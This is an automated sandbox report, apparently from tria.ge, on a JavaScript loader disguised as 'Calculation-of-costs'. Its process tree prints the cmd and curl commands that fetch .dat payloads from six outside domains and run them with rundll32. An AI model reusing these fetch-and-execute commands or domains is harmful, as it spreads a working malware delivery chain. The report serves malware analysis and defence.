Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    27s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230220-de
  • resource tags

    arch:x64arch:x86image:win7-20230220-delocale:de-deos:windows7-x64systemwindows
  • submitted
    07/06/2023, 18:07

General

  • Target

    Calculation-of-costs-874028386.js

  • Size

    149KB

  • MD5

    fb5b4219a7a47effe058b4a5e7e48a6c

  • SHA1

    421dd44ba85cb8278b7326b2c35d1078a375f79b

  • SHA256

    5b2290e985718dcb2b9ed3a4ea6f4982c9db96a9ac7d20e7ee8d11f4d1e0a94a

  • SHA512

    890e04f3efab155556b1dbe996d79687e64904881741e52707188c5bf513997fae904765b047c0e54e5c7774d12fab8cf9a0e73434f928ac9333ae585483974d

  • SSDEEP

    3072:gRzeIwVOOpMRgFAzMeTluFzdYfoJ+v9oh:B6Op/FanTluFzdYf7Sh

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Calculation-of-costs-874028386.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:296
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://skagnechri.com/0.34899733014845713.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
      2⤵
        PID:1816
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://maicobbbi.com/0.6013654457759208.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
        2⤵
          PID:500
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://yerkaija.com/0.03298715274427777.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
          2⤵
            PID:828
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://glovitol.com/0.9651502297082507.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
            2⤵
              PID:1616
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://vitcaka.com/0.7000805230969773.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
              2⤵
                PID:1724
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://lauconisc.com/0.9380485461932972.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
                2⤵
                  PID:1872
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX,menu
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:592
                  • C:\Windows\system32\timeout.exe
                    timeout 10
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1180
                  • C:\Windows\system32\rundll32.exe
                    rundll32 C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX,menu
                    3⤵
                      PID:2004

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads